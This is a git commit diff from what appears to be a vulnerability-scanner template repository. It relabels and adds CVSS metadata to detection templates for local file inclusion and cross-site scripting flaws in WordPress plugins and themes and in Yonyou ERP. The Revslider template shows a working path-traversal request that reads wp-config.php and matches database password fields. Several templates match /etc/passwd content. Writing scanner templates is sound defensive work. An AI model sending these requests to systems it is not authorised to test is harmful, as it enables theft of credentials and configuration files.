Dashboard Content Enhancements (#4943)

Dashboard Content Enhancements
2022-07-29 10:04:23 -04:00 · 2022-07-29 10:04:23 -04:00 · 8c3ab6c654
parent 1cb4a74be1
commit 8c3ab6c654
17 changed files with 159 additions and 61 deletions
--- a/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml
+++ b/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml
@ -1,10 +1,10 @@
 id: nativechurch-wp-theme-lfd

 info:
-  name: WordPress NativeChurch Theme - Arbitrary File Retrieval
+  name: WordPress NativeChurch Theme - Local File Inclusion
  author: 0x_Akoko
  severity: high
-  description: An arbitrary file retrieval vulnerability in the download.php file in the NativeChurch Theme allows attackers to download files from the system.
+  description: WordPress NativeChurch Theme is vulnerable to local file inclusion in the download.php file.
  reference:
    - https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html
  tags: wordpress,wp-theme,lfi
@ -24,3 +24,5 @@ requests:
          - "The base configurations of the WordPress"
        part: body
        condition: and
+
+# Enhanced by mp on 2022/07/29
--- a/vulnerabilities/wordpress/shortcode-lfi.yaml
+++ b/vulnerabilities/wordpress/shortcode-lfi.yaml
@ -1,15 +1,18 @@
 id: shortcode-lfi

 info:
-  name: WordPress Plugin Download Shortcode Local File Inclusion (0.2.3)
+  name: WordPress Download Shortcode 0.2.3 - Local File Inclusion
  author: dhiyaneshDK
  severity: high
-  description: WordPress Plugin Download Shortcode is prone to a local file inclusion vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to obtain
-    sensitive information that could aid in further attacks. WordPress Plugin Download Shortcode version 0.2.3 is vulnerable; prior versions may also be affected.
+  description: WordPress Download Shortcode 0.2.3 is prone to a local file inclusion vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. Prior versions may also be affected.
  reference:
    - https://packetstormsecurity.com/files/128024/WordPress-ShortCode-1.1-Local-File-Inclusion.html
  metadata:
    google-dork: inurl:wp/wp-content/force-download.php
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
  tags: wordpress,wp-plugin,lfi,shortcode,wp

 requests:
@ -29,3 +32,5 @@ requests:
      - type: status
        status:
          - 200
+
+# Enhanced by mp on 2022/07/29
--- a/vulnerabilities/wordpress/simple-image-manipulator-lfi.yaml
+++ b/vulnerabilities/wordpress/simple-image-manipulator-lfi.yaml
@ -1,12 +1,16 @@
 id: simple-image-manipulator-lfi

 info:
-  name: Simple Image Manipulator v1.0 - Remote file download
+  name: WordPress Simple Image Manipulator 1.0 - Local File Inclusion
  author: dhiyaneshDK
  severity: high
-  description: In ./simple-image-manipulator/controller/download.php no checks are made to authenticate user or sanitize input when determining file location.
+  description: WordPress Simple Image Manipulator 1.0 is vulnerable to local file inclusion in ./simple-image-manipulator/controller/download.php  because no checks are made to authenticate users or sanitize input when determining file location.
  reference:
    - https://packetstormsecurity.com/files/132962/WordPress-Simple-Image-Manipulator-1.0-File-Download.html
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
  tags: wordpress,wp-plugin,lfi,wp

 requests:
@ -23,3 +27,5 @@ requests:
      - type: status
        status:
          - 200
+
+# Enhanced by mp on 2022/07/29
--- a/vulnerabilities/wordpress/sniplets-lfi.yaml
+++ b/vulnerabilities/wordpress/sniplets-lfi.yaml
@ -1,11 +1,16 @@
 id: sniplets-lfi

 info:
-  name: Wordpress Plugin Sniplets 1.1.2 - LFI
+  name: WordPress Sniplets 1.1.2 - Local File Inclusion
  author: dhiyaneshDK
  severity: high
+  description: WordPress Sniplets 1.1.2 is vulnerable to local file inclusion.
  reference:
    - https://www.exploit-db.com/exploits/5194
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
  tags: wordpress,wp-plugin,lfi,wp

 requests:
@ -25,3 +30,5 @@ requests:
      - type: status
        status:
          - 200
+
+# Enhanced by mp on 2022/07/29
--- a/vulnerabilities/wordpress/video-synchro-pdf-lfi.yaml
+++ b/vulnerabilities/wordpress/video-synchro-pdf-lfi.yaml
@ -1,12 +1,17 @@
 id: video-synchro-pdf-lfi

 info:
-  name: Videos sync PDF 1.7.4 - Unauthenticated Local File Inclusion
+  name: WordPress Videos sync PDF 1.7.4 - Local File Inclusion
  author: Hassan Khan Yusufzai - Splint3r7
  severity: high
+  description: WordPress Videos sync PDF 1.7.4 is vulnerable to local file inclusion.
  reference:
    - https://www.exploit-db.com/exploits/50844
    - https://wordpress.org/plugins/video-synchro-pdf/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
  tags: wordpress,wp-plugin,lfi,wp

 requests:
@ -23,3 +28,5 @@ requests:
      - type: status
        status:
          - 200
+
+# Enhanced by mp on 2022/07/29
--- a/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml
+++ b/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml
@ -1,12 +1,17 @@
 id: wordpress-wordfence-lfi

 info:
-  name: Wordpress Wordfence 7.4.5 - Arbitrary File Retrieval
+  name: WordPress Wordfence 7.4.5 - Local File Inclusion
  author: 0x_Akoko
  severity: high
+  description: WordPress Wordfence 7.4.5 is vulnerable to local file inclusion.
  reference:
    - https://www.exploit-db.com/exploits/48061
    - https://www.nmmapper.com/st/exploitdetails/48061/42367/wordpress-plugin-wordfence745-local-file-disclosure/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
  tags: wordpress,wp-plugin,lfi,wordfence

 requests:
@ -24,3 +29,5 @@ requests:
      - type: status
        status:
          - 200
+
+# Enhanced by mp on 2022/07/29
--- a/vulnerabilities/wordpress/wp-javospot-lfi.yaml
+++ b/vulnerabilities/wordpress/wp-javospot-lfi.yaml
@ -1,14 +1,18 @@
 id: wp-javospot-lfi

 info:
-  name: Javo Spot Premium Theme - Unauthenticated Directory Traversal
+  name: WordPress Javo Spot Premium Theme - Local File Inclusion
  author: 0x_Akoko
  severity: high
-  description: A vulnerability in Javo Spot Premium Theme allows remote unauthenticated attackers access to locally stored file and return their content.
+  description: WordPress Javo Spot Premium Theme is vulnerable to local file inclusion that allows remote unauthenticated attackers access to locally stored file and return their content.
  reference:
    - https://codeseekah.com/2017/02/09/javo-themes-spot-lfi-vulnerability/
    - https://wpscan.com/vulnerability/2d465fc4-d4fa-43bb-9c0d-71dcc3ee4eab
    - https://themeforest.net/item/javo-spot-multi-purpose-directory-wordpress-theme/13198068
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
  tags: wordpress,wp-theme,lfi,wp

 requests:
@ -28,3 +32,5 @@ requests:
      - type: status
        status:
          - 200
+
+# Enhanced by mp on 2022/07/29
--- a/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml
+++ b/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml
@ -1,13 +1,17 @@
 id: wp-memphis-documents-library-lfi

 info:
-  name: WordPress Plugin Memphis Document Library 3.1.5 LFI
+  name: WordPress Memphis Document Library 3.1.5 - Local File Inclusion
  author: 0x_Akoko
  severity: high
-  description: Arbitrary file download in Memphis Document Library 3.1.5
+  description: WordPress Memphis Document Library 3.1.5 is vulnerable to local file inclusion.
  reference:
    - https://www.exploit-db.com/exploits/39593
    - https://wpscan.com/vulnerability/53999c06-05ca-44f1-b713-1e4d6b4a3f9f
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
  tags: wordpress,wp-plugin,lfi

 requests:
@ -28,3 +32,5 @@ requests:
      - type: status
        status:
          - 200
+
+# Enhanced by mp on 2022/07/29
--- a/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml
+++ b/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml
@ -1,12 +1,16 @@
 id: wp-oxygen-theme-lfi

 info:
-  name: WordPress Oxygen-Theme - Arbitrary File Retrieval
+  name: WordPress Oxygen-Theme - Local File Inclusion
  author: 0x_Akoko
  severity: high
-  description: The WordPress Oxygen-Theme has a local file retrieval vulnerability in 'file' parameter of 'download.php'.
+  description: WordPress Oxygen-Theme has a local file inclusion vulnerability via the 'file' parameter of 'download.php'.
  reference:
    - https://cxsecurity.com/issue/WLB-2019030178
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
  tags: wordpress,wp-theme,lfi

 requests:
@ -26,3 +30,5 @@ requests:
      - type: status
        status:
          - 200
+
+# Enhanced by mp on 2022/07/29
--- a/vulnerabilities/wordpress/wp-revslider-file-download.yaml
+++ b/vulnerabilities/wordpress/wp-revslider-file-download.yaml
@ -1,33 +1,39 @@
-id: wp-revslider-file-download
+id: wp-revslider-file-download

-info:
-  name: Wordpress Revslider - Arbitrary File Retrieval
-  author: pussycat0x
-  severity: high
-  description: The Revslider WordPress plugin iss affected by an unauthenticated file retrieval vulnerability, which could result in attacker downloading the wp-config.php file.
-  reference:
-    - https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html
-    - https://cxsecurity.com/issue/WLB-2021090129
-  metadata:
-    google-dork: inurl:/wp-content/plugins/revslider
-  tags: wordpress,wp-plugin,lfi,revslider
+info:
+  name: Wordpress Revslider - Local File Inclusion
+  author: pussycat0x
+  severity: high
+  description: WordPress Revslider  is affected by an unauthenticated file retrieval vulnerability, which could result in attacker downloading the wp-config.php file.
+  reference:
+    - https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html
+    - https://cxsecurity.com/issue/WLB-2021090129
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  metadata:
+    google-dork: inurl:/wp-content/plugins/revslider
+  tags: wordpress,wp-plugin,lfi,revslider

-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
-      - '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "'DB_NAME'"
-          - "'DB_PASSWORD'"
-          - "'DB_USER'"
-        condition: and
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
+      - '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "'DB_NAME'"
+          - "'DB_PASSWORD'"
+          - "'DB_USER'"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/07/29
--- a/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml
+++ b/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml
@ -1,9 +1,10 @@
 id: wp-simple-fields-lfi

 info:
-  name: WordPress Plugin Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE
+  name: WordPress Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE
  author: 0x240x23elu
  severity: high
+  description: WordPress Simple Fields 0.2 is vulnerable to local file inclusion, remote file inclusion, and remote code execution.
  reference:
    - https://packetstormsecurity.com/files/147102/WordPress-Simple-Fields-0.3.5-File-Inclusion-Remote-Code-Execution.html
  tags: wordpress,wp-plugin,lfi
@ -17,4 +18,6 @@ requests:
      - type: regex
        regex:
          - "root:.*:0:0:"
-        part: body
+        part: body
+
+# Enhanced by mp on 2022/07/29
--- a/vulnerabilities/wordpress/wp-socialfit-xss.yaml
+++ b/vulnerabilities/wordpress/wp-socialfit-xss.yaml
@ -1,13 +1,17 @@
 id: wp-socialfit-xss

 info:
-  name: WordPress Plugin SocialFit - 'msg' Cross-Site Scripting
+  name: WordPress SocialFit - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: |
-    SocialFit plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+    WordPress SocialFit is vulnerable to a cross-site scripting vulnerability via the 'msg' parameter because it fails to properly sanitize user-supplied input.
  reference:
    - https://www.exploit-db.com/exploits/37481
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
  tags: wordpress,xss,wp-plugin

 requests:
@ -27,3 +31,5 @@ requests:
      - type: status
        status:
          - 200
+
+# Enhanced by mp on 2022/07/29
--- a/vulnerabilities/wordpress/wp-tinymce-lfi.yaml
+++ b/vulnerabilities/wordpress/wp-tinymce-lfi.yaml
@ -1,13 +1,17 @@
 id: wp-tinymce-lfi

 info:
-  name: Tinymce Thumbnail Gallery <= 1.0.7 - download-image.php LFI
+  name: Tinymce Thumbnail Gallery <=1.0.7 - Local File Inclusion
  author: 0x_Akoko
  severity: high
-  description: The Tinymce Thumbnail Gallery WordPress plugin was affected by a download-image.php Local File Inclusion security vulnerability.
+  description: Tinymce Thumbnail Gallery 1.0.7 and before are vulnerable to local file inclusion via download-image.php.
  reference:
    - https://wpscan.com/vulnerability/4a49b023-c1c9-4cc4-a2fd-af5f911bb400
    - http://wordpress.org/extend/plugins/tinymce-thumbnail-gallery/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
  tags: wordpress,wp-theme,lfi,wordpress,tinymce

 requests:
@ -27,3 +31,5 @@ requests:
      - type: status
        status:
          - 200
+
+# Enhanced by mp on 2022/07/29
--- a/vulnerabilities/wordpress/wp-tutor-lfi.yaml
+++ b/vulnerabilities/wordpress/wp-tutor-lfi.yaml
@ -1,11 +1,16 @@
 id: wp-tutor-lfi

 info:
-  name: WordPress Plugin tutor.1.5.3 - Local File Inclusion
+  name: WordPress tutor 1.5.3 - Local File Inclusion
  author: 0x240x23elu
  severity: high
+  description: WordPress tutor.1.5.3 is vulnerable to local file inclusion.
  reference:
    - https://www.exploit-db.com/exploits/48058
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
  tags: wordpress,wp-plugin,lfi

 requests:
@ -17,4 +22,6 @@ requests:
      - type: regex
        regex:
          - "root:.*:0:0:"
-        part: body
+        part: body
+
+# Enhanced by mp on 2022/07/29
--- a/vulnerabilities/wordpress/wp-vault-lfi.yaml
+++ b/vulnerabilities/wordpress/wp-vault-lfi.yaml
@ -1,11 +1,16 @@
 id: wp-vault-local-file-inclusion

 info:
-  name: WP Vault 0.8.6.6 Local File Inclusion
+  name: WordPress Vault 0.8.6.6 - Local File Inclusion
  author: 0x_Akoko
  severity: high
+  description: WordPress Vault 0.8.6.6 is vulnerable to local file inclusion.
  reference:
    - https://www.exploit-db.com/exploits/40850
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
  tags: wp-plugin,wordpress,lfi

 requests:
@ -23,3 +28,5 @@ requests:
      - type: status
        status:
          - 200
+
+# Enhanced by mp on 2022/07/29
--- a/vulnerabilities/yonyou/erp-nc-directory-traversal.yaml
+++ b/vulnerabilities/yonyou/erp-nc-directory-traversal.yaml
@ -1,11 +1,16 @@
 id: erp-nc-directory-traversal

 info:
-  name: ERP-NC directory traversal
+  name: ERP-NC - Local File Inclusion
  author: pikpikcu
  severity: high
+  description: ERP-NC is vulnerable to local file inclusion.
  reference:
    - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
  tags: lfi,erp-nc

 requests:
@ -26,3 +31,5 @@ requests:
      - type: status
        status:
          - 200
+
+# Enhanced by mp on 2022/07/29
--- a/vulnerabilities/yonyou/wooyun-path-traversal.yaml
+++ b/vulnerabilities/yonyou/wooyun-path-traversal.yaml
@ -1,15 +1,17 @@
 id: wooyun-path-traversal

 info:
-  name: Wooyun Path Traversal
+  name: Wooyun - Local File Inclusion
  author: pikpikcu
  severity: high
  description: |
-    A general document of UFIDA ERP-NC contains a vulnerability
-    (affecting a large number of well-known school government and enterprise cases
-    such as COFCO/Minsheng E-commerce/Tsinghua University/Aigo)
+    Wooyun is vulnerable to local file inclusion.
  reference:
    - https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
  tags: lfi,wooyun

 requests:
@ -28,3 +30,5 @@ requests:
          - </DataSourceClassName>
        part: body
        condition: and
+
+# Enhanced by mp on 2022/07/29